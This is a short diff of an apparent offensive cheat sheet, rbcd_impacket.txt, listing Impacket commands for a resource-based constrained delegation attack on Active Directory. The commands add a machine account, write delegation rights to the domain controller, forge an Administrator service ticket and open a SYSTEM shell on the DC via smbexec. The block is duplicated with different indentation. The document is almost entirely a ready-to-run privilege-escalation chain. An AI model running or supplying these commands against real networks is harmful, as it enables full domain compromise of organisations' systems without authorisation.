eversinc33 · December 2, 2022 23:31
diff --git a/rbcd_impacket.txt b/rbcd_impacket.txt
 # add computer account
 impacket-addcomputer domain/user:Password -dc-ip dc.domain.local

 # add RBCD to added computer
 impacket-rbcd domain/user:Password -delegate-to 'DC$' -dc-ip dc.domain.local -action write -delegate-from 'DESKTOP-XC3RS3G7$'

 # get ticket for dc cifs for Administrator
 impacket-getST -spn 'cifs/dc.domain.local' -impersonate Administrator -dc-ip dc.domain.local 'DOMAIN/DESKTOP-XC3RS3G7$:w06DJlMdlKNUVSpqN0olSEctZHZEQgZU'

 # use ticket to get shell as SYSTEM
 export KRB5CCNAME=$(pwd)Administrator.ccache
 impacket-smbexec [email protected] -k -no-pass
	# add computer account
	impacket-addcomputer domain/user:Password -dc-ip dc.domain.local

	# add RBCD to added computer
	impacket-rbcd domain/user:Password -delegate-to 'DC$' -dc-ip dc.domain.local -action write -delegate-from 'DESKTOP-XC3RS3G7$'

	# get ticket for dc cifs for Administrator
	impacket-getST -spn 'cifs/dc.domain.local' -impersonate Administrator -dc-ip dc.domain.local 'DOMAIN/DESKTOP-XC3RS3G7$:w06DJlMdlKNUVSpqN0olSEctZHZEQgZU'

	# use ticket to get shell as SYSTEM
	export KRB5CCNAME=$(pwd)Administrator.ccache
	impacket-smbexec [email protected] -k -no-pass